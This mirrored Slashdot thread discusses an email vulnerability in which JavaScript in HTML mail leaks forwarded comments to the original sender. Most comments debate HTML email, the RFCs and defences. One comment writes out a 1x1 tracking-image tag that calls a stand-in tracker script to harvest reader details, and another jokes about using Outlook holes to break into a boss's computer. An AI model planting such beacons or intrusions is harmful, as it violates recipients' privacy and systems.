Slashdot Mirror


New E-Mail Vulnerability - Trust Your Neighbor?

Anonymous Coward writes: "According to this article in The New York Times (free registration required), a trick enables someone to essentially bug an e-mail message so that the spy would be privy to any comments that a recipient might add as the message is forwarded to others or sent back and forth. The vulnerability could facilitate the harvesting of e-mail addresses. Widely used e-mail programs that are vulnerable to the exploit (because they enable JavaScript) include Microsoft Outlook, Outlook Express and Netscape 6." A snippet from the article: "The potential for such e-mail spying was first discovered by Carl Voth, an engineer in British Columbia. 'What bothers me is that in this case, my vulnerability is a function of what you do,' Mr. Voth said. 'I can be careful, I can take every precaution, I can turn off JavaScript, and it doesn't matter. If my neighbor isn't diligent and I send him an e-mail, I'm still vulnerable.'" "The Privacy Foundation, an educational and research organization based in Denver, plans to publicize and demonstrate the technique today."

186 comments

  1. Wrong! by www.sorehands.com · · Score: 3
    SPAMMERS have been using html in emails. They setup an cgi script to pick up an email address from the message. That part of the caller passes the sent email to a script back on the server through an image call.

    It's a way to confirm the reading of a message.

  2. How about "Plain Text" mode in Eudora (and equiv) by The_Laughing_God · · Score: 2

    In 20+ years of emailing, I have only come across one situation where I was even tempted to send or recieve anything remotely resembling HTML e-mail (namely 'rich text' color to clarify or emphasize variables or passages buried in group code) and even then I prefer MIME attachments.

    Further, my primary mail program (Eudora 4.22) is set to "send plain text only" and "don't ask". If I reply to or forward an HTML e-mail, all HTML is stripped out *before* sending (I tested it with an array of HTML spam "from the wild")

    This setting should be basic netiquette (for email programs so equipped - and the feature should be *expected* for e-mail programs) Alas, in a world where even the carriage return is considered a nicety, I don't hold out much hope.

    If you don't can't send javascript, the recipient can't carelessly mishandle it.

    {I welcome any INFORMED, TESTED observations on the deficiencies of this method. One can never be too paranoid)

    Don't forget to disable HTML viewing of e-mail (Warning: often the provided check-box alone is not sufficient), and be stingy about what programs are permitted to access the usual HTTP ports. These are virtually painless security procedures. I can't recall ever being particularly inconvenienced by them.

  3. Re:Just don't use HTML Mail! by zzzeek · · Score: 1

    sometimes the benifits of HTML mail are important.

    Such as? Particularly when HTML these days also means scripting languages, embedded objects, etc.

  4. Re:Another reason to stick to the RFC by teeth · · Score: 2
    I agree with the idea that, generally speaking, email should be plain text with formatting only existing in terms of the usual text formatting technqiues, such as newlines, *emphasis* and so on

    There are already mail clients (Gnus for one) which parse informal markup - _underlining_, *bold*, /italic/ - delimited sigs and URLs in plain text messages without any of the bandwidth or security implications.

    You can have your cake and eat it :)

    --
    >>>>truth; beauty; unix.<<<<
  5. javascript is not needed, html will do by washirv · · Score: 1

    so long as the email calls back to the server (for a 1 pixel gif, for instance) this exploit will always exist. The trick is to turn off html altogether, and just read text email. Better still, use a "backward" email reader that can read only text. :-)

    1. Re:javascript is not needed, html will do by netsharc · · Score: 1

      The "problem" here is that JavaScript can copy the contents of the whole page into a string, which it can then use as a part of an HTTP request, thereby enabling the owner of that HTTP server to see your email through his logs.

      --
      What time is it/will be over there? Check with my iPhone app!
  6. WTF!! RTFA! by aunitt · · Score: 1

    Whoever modded this up should be shot.

    This idiot obviously didn't read the article and then got modded up again for being a gimboid!

  7. Re:Minor Nitpick by roca · · Score: 2

    That's a rather tough assessment of Javascript. It certainly has its flaws, but on the other hand, it has made a lot of interactive Web-based applications possible that wouldn't have been doable otherwise.

    Javascript has been standardised by ECMA for some time. There have been many security issues, but it's not clear that alternative technologies for doing the same things would have been safer.

  8. Re:Security models? by AnotherBlackHat · · Score: 1
    active content is another step along the way, but I can't see that it is a Bad Thing,if the security model is good

    The difference between standing on the edge and falling off is a single step.

    Enabling Javascript is like putting on a blindfold and running at full speed.

  9. Why plain text and copy are best by WillSeattle · · Score: 3

    As you no doubt know, the no registration version of the article is here.

    That said, just as with web gnats/bugs, invisible GIFs, and suchlike, there are many ways to avoid this:

    1. Use PINE. Who needs graphics anyway?
    2. Turn off all Java, Javascript, etc and view all emails as Text. Then use the Copy and Paste functions to forward only the From:, Subject:, and Date: fields in the email along with the body of the text.
    3. If you want to forward pictures or attachments, save them to a file, and convert any DOC or other embedded files to a non-embedded format such as ASCII Text. Then create an email and attach those new files instead.
    4. Hunt down and launch boycotts and similar actions against the creators of these things. Show no mercy.
    5. Send a copy of all such spam to all your legislators - municipal, county, state, federal, president/etc. Send it with the attachments and javascript. Include your name and adress in the forward so the spam software on their end will not put it in the spam box, and ask them what they will do about it. And send a copy to uce@ftc.gov for fun.

    --
    --- Will in Seattle - What are you doing to fight the War?
    1. Re:Why plain text and copy are best by mrfiddlehead · · Score: 1
      If you are an emacs user then go ahead and use PINE. If you are a vi user, fuck PINE, use mutt.

      Fuck I hate pine.

      --
      :wq
  10. Security models? by gattaca · · Score: 5

    Surely the problem is not with HTML or Javascript in emails at all - its more to do with the fact that email browsers have a poor (if any) security model.

    One of the good things about client-side Java (rather than Javascript) is that it runs in a sandbox with a well defined security model that doesn't allow, for instance, content to be uploaded from the client machine unless you specifically say that that's OK by jumping through various hoops.

    The post refers to two problems: firstly, Javascript making a connection from a client machine when the client user doesn't want that to happen, and secondly, mailreaders allow modifications (such as adding content) to an HTML document, but do not distinguishing between the original copy and the modified one. (By warning of embedded Javascript, or content stripping, or whatever).

    The problem is more to do with client browsers having a crap security model rather than the idea of having HTML or Javascript in an email in itself.
    I guess that most people who read or post to slashdot are happy with being able to use markups in their posts so they can italicise or embolden things or add links. HTML in text is a Good Thing here, are emails that different?

    Active content is another step along the way, but I can't see that it is a Bad Thing, if the security model is good. I don't know enough about Javascript to comment about whether this is possible. Any comments?

    1. Re:Security models? by PigleT · · Score: 2

      "Surely the problem is not with HTML or Javascript in emails at all - its more to do with the fact that email browsers have a poor (if any) security model."

      Surely the problem is with your "neighbour" who can forward anything he likes to whosoever he likes, not with the "technology" at all?

      This is what GPG is about: you have a trust model that you can use to pin folks down more responsibly to what they send where, and when you no longer trust someone as much as before, you have the means to say so - making the incentive for them not to do nasty things to your private mails. In that regard, this is nothing new - pass on, nothing to see here.
      ~Tim
      --
      .|` Clouds cross the black moonlight,

      --
      ~Tim
      --
      .|` Clouds cross the black moonlight,
      Rushing on down to the circle of the turn
    2. Re:Security models? by Kanasta · · Score: 1

      The problem is not HTML. It's javascript.

      I'd like to propose an experiment. We should allow ppl to put JS in their posts here for about a week, and see what people can get up to.

      Then the next week all the smart people can suggest how to implement a security model, after which we'll go for another week and see if anything improves.


      ---

    3. Re:Security models? by gattaca · · Score: 2

      Yup. The problem is with people not implementing active-content enabled browsers properly. I'm simply saying that in this case we should shoot the messenger, not the message.

    4. Re:Security models? by gattaca · · Score: 2

      Surely the problem is with your "neighbour" who can forward anything he likes to whosoever he likes, not with the "technology" at all?
      Yeees, except that the Internet's a dangerous place and you have to accept that horrible people will try to do horrible things. So, trying to enforce accountability and honesty is a good thing, but you also have to protect yourself with appropriate software.

  11. Re:Another reason to stick to the RFC by boing+boing · · Score: 2

    I do believe that I agree with you that everyone should stick to non-HTML mail, but one HTML capability should be in all mail forms, and that is HTML links. I can't tell you how many relatives that I have that couldn't possibly figure out how to copy and paste something into their browser. Links are a necessity, but lets get rid of javascript and images right now.

  12. Re:Active vs passive content in emails by Raul+Acevedo · · Score: 1
    I dislike HTML in e-mail. A lot. However, I must now play devil's advocate, because I realize that like spam, it is an annoying fact of modern e-mail that ain't going away...
    Active content doesn't enhance the e-mail experience for most users, nor does it increase their productivity to any measurable extent. For most people, what is important is the actual *content*, the presentation is in most real-world cases a secondary, trivial issue.
    I say at least 50% of non-technical users regularly use HTML e-mail features all the time, either on purpose (graphic images as part of their signature, special fonts), or without knowing it (most emails I get from non-technical people that are not sent via Hotmail or Yahoo!-type accounts come as MIME multipart, i.e. HTML with a second text-only version).
    HTML-based e-mail is larger, slower, potentially a hassle across a heterogeneous array of e-mail clients
    It's not noticeably slower. It is larger, but nobody in corporate america notices. I think most standard mail clients for Windows and the Mac can handle HTML emails equally well. As for Unix/Linux, who cares? (Not my opinion, Linux has been my primary desktop for years.)
    On the other hand, your assertion that "(business types) are not concerned about privacy issues" is simply naive at best. It's a cutthroat world and business users have things like trade secrets and confidential information to worry about. And I would suspect that most people, in a business environment or otherwise, would like to believe that their e-mail correspondance is private. I'd even go so far as to bet that the majority of users actually *believe* their e-mail is private, and would be upset to find out otherwise.
    Actually, businesses pretend they care about privacy, but only as far as protecting privacy doesn't hinder convenience. Note that employees already know their email isn't private; companies read employee email all the time. But even in keeping it secure, companies will sacrifice security for the sake of convenience and simplicity. It happens all the time.
    ----------
    --
    In a real emergency, we would have all fled in terror, and you would not have been notified.
  13. Trust Your Neighbor? by Dust+Puppy · · Score: 1

    You don't need to trust your neighbor, no matter what email client you use. If you don't want to trust your neighbor, just always reply in plain text (as opposed to HTML) no matter what format the message was sent in. Generate no HTML mail and you are not at risk from this exploit.

  14. Re:Minor Nitpick by roca · · Score: 2

    The DOM APIs are not "totally nonstandardized". In fact they have been standardized by the W3C. The APIs supported by Mozilla/Netscape6 are basicallly just a little less and a little more than W3C DOM2. Konqueror is catching up fast. Opera is lagging behind a bit but is basically on the same path.

    Only Microsoft, and WinIE in particular, are deliberately avoiding proper support for the standard DOM. But the subset of the W3C DOM that works in IE 5.5 is actually quite large and very useful.

  15. Re:Security by Your+Login+Here · · Score: 1
    This is why PGP has the option to mark a message as decryptable to screen only.
    In other words PGP can be used as access control, just like CSS? And the OS world supports this?
  16. Re:No free reg by Karoshi · · Score: 1

    Use as user/pass combination a/a (or was aaaaa/aaaaa for sites that require longer pwds), that works for most sites.

    --
    Don't answer me. Moderate. Slashdot is about moderation, not discussion.
  17. Simple Fix: Edit sendmail.cf... by BigBlockMopar · · Score: 3

    Here's a simple fix. Edit sendmail.cf.

    Make a filter:

    Any e-mail that comes to you with X-Mailer: Microsoft Outlook Express 5.50.4133.2400 or similar in the headers, gets relayed to /dev/null.

    Soon, the Windows proles will realize that sending to you is fruitless and will eventually go away.

    Okay, fine, it's not practical, but it would still be fun to do.

    Or, you could use Outlook's many vulnerabilities to break into your boss's computer and change his Windows startup tune to this in order to prove the point.

    He doesn't use Outcast any more. I consider that to be a victory.

    --
    Fire and Meat. Yummy.
  18. Re:Enable Javascript for Mail and News by Evil+Grinn · · Score: 1
    They are aware that you can turn off javascript, but what if the person you forward your mail to hasn't turned off javascript?

    My question is, why in the world would does the browser have it turned on by default? The end-user should have to go out of his way to enable JavaScript in email, not the other way around.
    ---

  19. Re:Just don't use HTML Mail! by Korth · · Score: 1

    Oooh! That's a great idea. Lets go back to the glorious days of ASCII art, fixed width fonts, before the days you could use hyperlinks, or maybe back to the wonderful ASCII tables.

    Although a great deal of the HTML features are utterly useless in a E-mail (e.g. scripting languages and JavaScript), sometimes the benifits of HTML mail are important.

  20. Re:Our organization by Keel · · Score: 1

    Using pine IS a malay!

    --

    ----

    "Oh, bother," said Pooh, as he hid Piglet's mangled corpse.

  21. Javascript =! Email by Rotten · · Score: 1

    That's all.
    If I send the key for my front door in a transparent envelope, my doorlock is safe, the problem is my stupidity.

  22. we're always at the mercy of neighbours by CarrotLord · · Score: 2
    no matter if everyone used pine for email, we would still be vulnerable to our friends' email stupidity -- for eg, I often get forwarded chain letters from friends who include my address along with the "CC this email to spammer@spamcity.com to win your prize" address... the biggest bugs in out email systems are people...

    rr

    --
    Quidquid latine dictum sit, altum videtur.
  23. Another reason to stick to the RFC by Masem · · Score: 3
    A few weeks back we had a discussion here about a new email client for Linux that was 'compatible' with LookOut, including support for HTML email. I posted a small rant on why that's not a feature, but a bug, and a few called me a ludite.

    *THIS* type of vunerability is exactly one of the reasons that you should not be using HTML for email, particular with the email clients that use an embedded browser window to display the information. Because not only do you as a malicious email sender gain access to the bugs that arise from the email client itself (eg the ability to email everyone in the address book from a script), but bugs inherit from the browser.

    The email RFC says to stick to plain text for all messages, and if you do that, the only bugs that you will encounter will be those that are from the mailers, and it will be very hard to trigger security problems such as this. You might complain about losing formatting and such, but that's also why the Rich Text format was developed; it carries enough of the HTML formatting that some need to emphasis email but none of the deadweight that can trigger security and privacy violations. Unfortunately, RTF wasn't highly accepted and after MS did a nice 'embrace and extend' of it, it was pretty much worthless.

    --
    "Pinky, you've left the lens cap of your mind on again." - P&TB
    "I can see my house from here!" - ST:
    1. Re:Another reason to stick to the RFC by bogado · · Score: 1

      I have to agree with you, many people like HTML messages because they can format their messages (some what like a rich-text or irgh .doc, but better because it's an open standad, for now at least). This need dosen't require fetching images and/or executing scripts, those should be off by default.

      --
      "take the red pill and you stay in wonderland and I'll show you how deep the rabbit hole goes"

      --
      []'s Victor Bogado da Silva Lins

      ^[:wq

    2. Re:Another reason to stick to the RFC by The+Dark · · Score: 1
      Let's say, in my HTML email with your client, I sent: IMG SRC="mysecret.server.com/cgi/tracker.pl" HEIGHT=1 WIDTH=1&GT
      He did say "... *not* implementing Java, Javascript, image fetching... "
      That pretty much covers your example.
      --
      sig's not here
    3. Re:Another reason to stick to the RFC by elandal · · Score: 1

      Actually RFC 2045-2049 (Multipurpose Internet Mail Extensions) defines multipart/alternative, which allows sending email in several formats. And, the headers may specify content-type other than text for the main content, too.. It's possible to send eg. a picture without any text (the picture being the content of the message).

      What You're referring to with "The email RFC" I don't know. RFC822 (Standard for the format of ARPA Internet text messages) specifies the headers and how they're separated from the body, but not the format of the body.

      Of course I'd expect all messages to have textual content and if the message contains the same content in HTML, too, that's OK.

    4. Re:Another reason to stick to the RFC by garbuck · · Score: 1
      I have never received an email where the extra formatting made me think "wow, this is so much better than just plain text".

      Yeah, right. Let's get rid of HTML. After all, couldn't we have a perfectly fine world wide web with only text files plus links? While we're at it, how 'bout we get rid of punctuation, too? I've never received a message where a comma made me think "wow, this is so much better than just plain language!".

    5. Re:Another reason to stick to the RFC by netsharc · · Score: 1

      I once got a long email which I replied to by answering the questions that were embedded in the paragraphs. First I used the standard ">" quoting, but then it looked a bit complicated and jumbled. So I changed to HTML mode and colored my reply blue. I hope it made my friend's live easier. I use Outlook 2000, by the way.. (*hides before the community come and get me*)

      --
      What time is it/will be over there? Check with my iPhone app!
    6. Re:Another reason to stick to the RFC by YU+Nicks+NE+Way · · Score: 2

      So, let me get this straight...there's an exploit based on an element of the RFC (read and return receipts) and an element of the display code (DOM/CSS support). From this, you immediately conclude that the DOM/CSS/HTML support is the problem. I suggest that you're showing the typical NIH attitude of unix-geeks: if we didn't create it, it's wrong. I'd like to advance the notion that the novel idea might be fine, and that the original RFC is clearly wrong.

      Why do you, the sender, need to know that I read your e-mail, much less be able to insert an arbitrary message body into that read receipt? You don't! It's not HTML/DOM/CSS support that's a problem here, it's the original designers that put a clear invasion of privacy into their mail protocol. E-mail was designed to mimic memoranda, and the parallel is pretty good -- but it isn't perfect. For my part, I'd rather that e-mail clients didn't ever send rr's; that would have been better design. If I want you to know that I read your mail, I'll respond, thank you very much.

      HTML e-mail is pervasive because the bulk of users find it useful. Just because you and I don't doesn't make it less useful to them.

    7. Re:Another reason to stick to the RFC by swb · · Score: 1

      I agree with the idea that, generally speaking, email should be plain text with formatting only existing in terms of the usual text formatting technqiues, such as newlines, *emphasis* and so on,

      There's a lot of people that want formatting -- is there a way to accomplish it without using HTML? The problem with HTML seems to me is that once you use HTML, people expect it to act like a browser rather than be a pure formatting. The other problem is the one you highlight, that developers (MS, mainly, but I'm sure others might fall victim) will re-use web display engines which open up the vulnerabilities.

      Is there another formatting "language" which could get applied without going down the HTML path? I supposed not for MS products, since anything that had any kind of cross-platform compatibility would be embraced and extended into insecurity by MS.

    8. Re:Another reason to stick to the RFC by mpe · · Score: 2

      *THIS* type of vunerability is exactly one of the reasons that you should not be using HTML for email, particular with the email clients that use an embedded browser window to display the information .The problem is in feeding whatever is in the email directly to a web browser. It's a cheap hack probably the reason why someone came up with HTML for email in the first place.

      The email RFC says to stick to plain text for all messages, and if you do that, the only bugs that you will encounter will be those that are from the mailers, and it will be very hard to trigger security problems such as this. You might complain about losing formatting and such, but that's also why the Rich Text format was developed .

      Alternativly there is markup of the human readable kind. e.g. *bold* _underline*, etc. Which an hald decent program can understand.

    9. Re:Another reason to stick to the RFC by Masem · · Score: 4
      Here's where you need to be careful.

      Let's say, in my HTML email with your client, I sent: <IMG SRC="mysecret.server.com/cgi/tracker.pl" HEIGHT=1 WIDTH=1> Where in the tracker.pl script, I just query the HTTP environment variables to tell what host the request came from and another other juicy details I might get, then return a 1x1 GIF image. There's no Javascript, and I don't need you to click on anything -- I just need you to open it and I can get information.

      HTML email is still very dangerous, and should be avoided.

      --
      "Pinky, you've left the lens cap of your mind on again." - P&TB
      "I can see my house from here!" - ST:
    10. Re:Another reason to stick to the RFC by david.given · · Score: 1
      *THIS* type of vunerability is exactly one of the reasons that you should not be using HTML for email, particular with the email clients that use an embedded browser window to display the information. Because not only do you as a malicious email sender gain access to the bugs that arise from the email client itself (eg the ability to email everyone in the address book from a script), but bugs inherit from the browser.

      I'm currently in the process of writing a mailer. (http://sqmail.sourceforge.net, if anyone's interested.) I'm including HTML rendering, because we use it at work, but I am determinedly *not* implementing Java, Javascript, image fetching, or indeed any kind of implicit networking by the HTML document.

      I'm thinking about allowing cid: URLs to access images sent in the mail message itself, but can't seem to find any reference for these. It may be an Outlookism.

      Oh, yes, and the mailer has no ability whatsoever to generate HTML messages. Plain text only.

    11. Re:Another reason to stick to the RFC by Cire · · Score: 1
      The email RFC says to stick to plain text for all messages


      That's all well and good, but let's face it: Most people want colored email. They want to be able to change the font size of their emails, and have bold and underline and italic. All things you can not do with plain text.

      You can quote RFC's till the cows come home, but people still want red text.

      What we really need is a program that will let you turn off javascript for emails while leaving it on for browsers
    12. Re:Another reason to stick to the RFC by ethereal · · Score: 1

      That's amazing, because I'm not sure that I've ever communicated with anyone who was able to actually use different fonts, colors, etc. to make a real difference in their emails. I have never received an email where the extra formatting made me think "wow, this is so much better than just plain text". Most of the time I think "damn the sender to Hell for making me squint at their tiny fonts!". Has anyone ever seen a worthwhile HTML email? Don't even get me started on the people who email you a whole web page rather than just sending you a link to it...

      I would be thrilled to have an option in Netscape to format incoming HTML-ized email as plain text, removing all tags and replacing paragraph tags with newlines, etc. To never look upon HTML email again would be a blessing indeed.

      --

      Your right to not believe: Americans United for Separation of Church and

    13. Re:Another reason to stick to the RFC by MikeTheYak · · Score: 2

      I don't think there is, other than hogging up space. The problem with images is in HTML mail is that they are often served remotely.

    14. Re:Another reason to stick to the RFC by MemRaven · · Score: 2

      Netscape does this. I can tell it to use JavaScript for web pages, but to disable it for mail/news, which is precisely what I've done. I'm not sure which client you're using, but mine works just fine.

    15. Re:Another reason to stick to the RFC by alprazolam · · Score: 1

      how are you going to pop up that link? using your browser? thats exploitable.

    16. Re:Another reason to stick to the RFC by Masem · · Score: 2

      MIME encoded attachments aren't the same as HTML email -- first, I've yet to see a mail client open these by default, and surprisingly a large number of 'newbies' know well enough not to open an attachment from an unknown source thanks to things like Melissa and ILOVEYOU. HTML email rarely gives you that option, or at least, the embedded browser window that is used to view the email, and will open everything without question. Second, MIME headers are standard text formats, so I with mutt or pine can figure out that you sent me a picture using LookOut or Eudora, and can save that attactment to a file. I've yet to see any specific standard for HTML email -- do you send it as an attachment? as the message? with the plain text version of message? Generally if you and your sender are using the same client, that's not a problem, but even two html-award email clients may view HTML differently, and the message will be garbled at one end. If you have to send something else besides text, MIME attachments are the right and RFC'd way to go.

      --
      "Pinky, you've left the lens cap of your mind on again." - P&TB
      "I can see my house from here!" - ST:
    17. Re:Another reason to stick to the RFC by thimo · · Score: 1

      Here, here... What a lot of people seem to be missing is that this "thing" is not a bug, not even an vulnerability, it's a *feature*, standard HTML/webpage behaviour. Stop using HTML in your mail! I don't want it, you don't want it either!!! Educate people on why they shouldn't want it and why they don't need fancy make-up in email and what overdoing fancy stuff can lead up to.

      Now, stick to not sending HTML to college's/friends and how could this vulnerability live on? The JavaScript bug comes from a third party, contained in the HTML. Don't forward the original HTML and the bug stops. Period! New message? No bug! Simple. No HTML.

      Cheers,

      Thimo
      --

      --
      Avoid the Gates of Hell. Use Linux!
    18. Re:Another reason to stick to the RFC by BlowCat · · Score: 1
      Make sure that your browser warns the user about embedded javascript and any external references (images, applets etc). It's better if you know about the malicious intent of your correspondent.

      Please make sure that not only the messages written in your client don't have any HTML tags, but also that all the messages quoted or forwarded by your client are free of them.

    19. Re:Another reason to stick to the RFC by Greyfox · · Score: 2
      I can't think of any reasonable use of HTML in E-Mail. If you want someone to look at your HTML, send him your fucking URL already.

      Perhaps all us text based mail people should start enclosing our mails in HTML flash tags...

      --

      I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

    20. Re:Another reason to stick to the RFC by ethereal · · Score: 1

      I'm not unhappy with HTML per se, I just don't think it's necessary in an email. If something requires such perfect formatting, just put it on a web page and send the link in the email.

      --

      Your right to not believe: Americans United for Separation of Church and

    21. Re:Another reason to stick to the RFC by roca · · Score: 2

      MIME is not just about attachments.

      > I've yet to see any specific standard for HTML
      > email.

      Then reread the MIME RFCs.

      > do you send it as an attachment? as the message?
      > with the plain text version of message?

      MIME allows all three. Sending your intended message body as an attachment would be confusing and I don't know why you'd want to do that. That leaves you with the choice of whether you want to send HTML only, or whether you want to send in both formats and let the recipient choose. For the former, you use "Content-Type: text/html" for the message body, and for the latter you use "Content-Type: multipart/alternative" with "text/html" and "text/plain" subparts.

      > even two html-award email clients may view HTML
      > differently

      This is a feature. The HTML should be rendered according to the recipient's preferences. This is actually a great feature of HTML --- I'm sick of reading email wrapped to the sender's screen width instead of my screen width.

      > If you have to send something else besides text,
      > MIME attachments are the right and RFC'd way to
      > go.

      You seem to be unaware that MIME lets you choose types for the body of the message too, including options such as "multipart/alternative" that let you provide the same content in different formats. Better reread the RFCs.

    22. Re:Another reason to stick to the RFC by MikeTheYak · · Score: 2

      Maybe because you don't have your own web site? What I don't get is why HTML mail can't simply be sandboxed - no scripting, no initiation of HTTP requests, etc. There's no reason I can think of that HTML couldn't be used for text formatting.

    23. Re:Another reason to stick to the RFC by Ed+Avis · · Score: 2

      It's a reason not to implement JavaScript or other scripting languages; it's a reason not to automatically fetch from the Web images and other objects embedded in messages. It's a reason not to do anything network-based just because of what you've received from an untrusted sender.

      But to blame this on HTML is mistaken. HTML is just a language allowing you to mark up paragraphs, headings, lists and so on. The problem comes from those who are implementing HTML readers and making them automatically execute fragments of code and automatically download images which are linked to.

      --
      -- Ed Avis ed@membled.com
    24. Re:Another reason to stick to the RFC by roca · · Score: 3

      The RFCs do NOT say to "stick to plain text for all messages". There are a number of MIME RFCs that are explicitly designed to make it possible to send anything you want in email.

      HTML email may or may not be a good idea, but don't try invoking the RFCs to stamp it out, because they're not on your side.

    25. Re:Another reason to stick to the RFC by Tralfamadorian · · Score: 1

      That would be perfectly feasable.... It would still allow colors, lists, tables, etc, but not images and other things that can open up holes. Or maybe if the image is included as an attachment it would display it (I don't know if there is a security risk of displaying an image that is on your box as an attachment.)


      He who knows not, and knows he knows not is a wise man

    26. Re:Another reason to stick to the RFC by Evil+Grinn · · Score: 1
      Has anyone ever seen a worthwhile HTML email?

      For things like ordered and unordered lists, tables (not for page layout!), and such, yes HTML can be helpful in email. These are things that you can easily do without, but which can sometimes make it much easier to say what you mean.

      Unfortunately very few people use it like that. There is no excuse for using JavaScript in email.
      ---

  24. Enable Javascript for Mail and News by Phaid · · Score: 3

    There's an option in Netscape to specifically turn off Javascript support for mail and news - under the Preferences->Advanced tab.

    I've been using that as long as I can remember, mainly to prevent Usenet spam posts from launching browser windows and such. I guess now there's an even better reason for it.

    Of course, for mail I use pine and tkrat in console and X respectively, so I dont really care much about this.

    1. Re:Enable Javascript for Mail and News by sulli · · Score: 2
      I never, ever turn it on. Of course it should not even be supported - I mean, come on, what do you need it for in an email?!?!? - but keeping it turned off is the best medicine.

      The annoying thing is that you have to jump through lots of hoops to do so (set Outlook as "Restricted Sites Zone", disable everything - don't forget that awful ActiveX - and then not turn on defaults again). Whoever designed this stuff should be permanently barred from the industry.

      --

      sulli
      RTFJ.
    2. Re:Enable Javascript for Mail and News by iceT · · Score: 2

      That is true, but as soon as you give your email address to ANYONE, you're at the identical risk you are pointing out. Ever been to Bluemountain.com, or hallmark.com? Someone you know decides to send you a 'free' card, and voila, your email is compromised.

      There are certain risks with your information, and as soon as you give that information to ANYONE, you are subject to their sensiblities.

      An email address that no one knows is nothing...

      --
      -- You can't idiot-proof anything, because they're always coming out with better idiots.
    3. Re:Enable Javascript for Mail and News by drinkypoo · · Score: 1
      There's an option in Netscape to specifically turn off Javascript support for mail and news - under the Preferences->Advanced tab.

      Also note that by default, javascript for mail and news is tutned off by default on Mozilla.

      Just another sign that some people actually do know what they're doing.

      As an aside, Java is off by default, too. (for webpages)


      --

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
  25. Re:That's Why..... by dattaway · · Score: 2

    You live in a dull grey world.

    I enjoy the soft glow of phosphorescent dots building the font's character.

    I suspect you'd be happy in pre-reform Russia, where there was none of that annoying advertising or any bright colors on the street.

    I suspect you live in Redmond, where Bill and his partners would never advertise you with any bright colors or loud music.

    The Linux command prompt is a hairshirt of denial.

    Whatever cranks your tractor.

  26. there is a way to stop this.. by xeer · · Score: 1

    Or at the very least a way to ensure mail you send or receive doesn't have Javascript. Use procmail to "DEFANG" the dangerous content of the email. This is a very good way of sanitizing email.

  27. Re:I agree by Nickoty · · Score: 1

    It may kinda of this topic, but I somewhat like when a new program comes with all eye-candy enabled. That way, I can get quite a good orientation about what the program is capable of offering. Then, I slaughter it to fit my needs. It's a bit lazy, but it's quite convenient. Could of course stab you in the back if you assume that all gui features were shown...
    Anyway, to somewhat come back on topic, showing of features course shouldn't include anything that constitute a security problem. In this case, I'd argue that the ideal case would have been a requester poping up first time the program is run, quickly informing you about the availability about javascript and its advantages and risks, and asking you if you still wanted it.
    The REAL question, IMHO, is of course 'why on earth would you want javascript in mail?', but that would be a troll, I guess.

    --


    -- Cure for Cancer instead of SETI! (only w32 yet - mail and beg)
  28. Re:Solution by dmmjr · · Score: 1
    Cutting and pasting from an HTML email, at least within Outlook Express 5, preserves embedded JavaScript that appears within the area selected to cut. So the suggestion might not work.

    David Martin, University of Denver

  29. Re:Active vs passive content in emails by crucini · · Score: 1

    I've generally found text-based mail (mutt) to be much more time-efficient than GUI mail clients. I grind through a huge amount of mail each morning, and greatly benefit from the speed with which mutt moves from message to message.
    However, I do miss one thing about 'rich mail' - the ability to use tables. Frequently a table expresses data best, but I'm not going to take the time to hand-build it in vi.

  30. Re:Minor Nitpick by roca · · Score: 2

    It was the marketers. The engineers originally called it Livescript but the marketers wanted to capitalize on the Java hype.

  31. Netscape Mail down since Sunday by skew · · Score: 1

    Anyone here work for Netscape? Their web-based mail has been down since sometime yesterday afternoon. Once you log in, you are forwarded to a page that claims they're upgrading their system.

    Since most web sites handle planned upgrades w/o a 24 hour downtime, does this mean they shut the system down to fix the JavaScript bug? (And even if so, how long does it take to add code to parse out <SCRIPT> tags anyway?)

    --

    You can't study the darkness by flooding it with light. --Edward Abbey

  32. Friends... by Hard_Code · · Score: 1

    ...don't let friends send email with javascript...

    --

    It's 10 PM. Do you know if you're un-American?
  33. Re:Active vs passive content in emails by omega_rob · · Score: 1
    Bah, this is nonsense. It doesn't require significantly more keyclicks to convey useful information in a non-HTML format.

    Active content doesn't enhance the e-mail experience for most users, nor does it increase their productivity to any measurable extent. For most people, what is important is the actual *content*, the presentation is in most real-world cases a secondary, trivial issue.

    Your assertion that "people don't want any extra time or hassle in their emails" has some validity. It's unfortunately in direct opposition to your main argument, however. HTML-based e-mail is larger, slower, potentially a hassle across a heterogeneous array of e-mail clients, and subject to security issues that simply aren't present in standard text-only e-mail.

    On the other hand, your assertion that "(business types) are not concerned about privacy issues" is simply naive at best. It's a cutthroat world and business users have things like trade secrets and confidential information to worry about. And I would suspect that most people, in a business environment or otherwise, would like to believe that their e-mail correspondance is private. I'd even go so far as to bet that the majority of users actually *believe* their e-mail is private, and would be upset to find out otherwise.

    Disabling HTML in e-mails is not the solution to anything, but your original message was so patently silly that it merited a response. People should simply be better informed about their privacy and the implications of using e-mail. E-mail clients should be proactive about incorporating encryption and other privacy-related methods into themselves to make it easier for people to protect themselves. PGP and its ilk are too much work and hassle for the average user.

    omega_rob

  34. Re:Our organization by ethereal · · Score: 1

    Aha! He was aiming for "malady" and missed the 'd'. Sometimes the smallest things cause the biggest problems of comprehension.

    --

    Your right to not believe: Americans United for Separation of Church and

  35. That's Why..... by matth · · Score: 1

    That's why I use PINE =) I seem to be un-touched by e-mail viruses, and other stuff heheheh

    1. Re:That's Why..... by BigBlockMopar · · Score: 2

      That's why I can't see any HTML email. Oh sure, you could just ignore everyone that uses it, sorta like buying a Beta VCR and ignoring all those movies that come out on VHS.

      Bah.

      I use Pine on my Linux boxen and Eudora on my Windows boxen.

      My main (and favorite) VCR is a Sony SL-HF500 Beta Hi-Fi.

      I rent the new movies on DVD. If I like 'em, I toss a new cassette into the Beta, and hit record. ('Course, they're for personal use only, they may get two viewings before they hit the bulk-eraser.)

      Cool thing about Beta, to liken it to e-mail clients, is that it's immune to video virii like Macrovision.

      --
      Fire and Meat. Yummy.
    2. Re:That's Why..... by PurpleBob · · Score: 1

      Have you tried Mutt?

      Once you start using Mutt, you'll realize just how clunky Pine's interface is.
      --
      Obfuscated e-mail addresses won't stop sadistic 12-year-old ACs.

      --
      Win dain a lotica, en vai tu ri silota
    3. Re:That's Why..... by DeadSea · · Score: 3
      Hotmail is said to not be vulnerable. I belive that hotmail (and many other web based email providers) strip out all but some allowed subset of html (sort of like slashdots allowed html in comments.) I use Eudora and when I send a forwarded message it asks me if I want to send it plain or styled. I always select plain.

      I believe that any email that passes through webmail, or has html stripped by some email program like Eudora will be innoculated.

      Add this to the list of things that web mail programs will have to check for though....

    4. Re:That's Why..... by MackE · · Score: 1

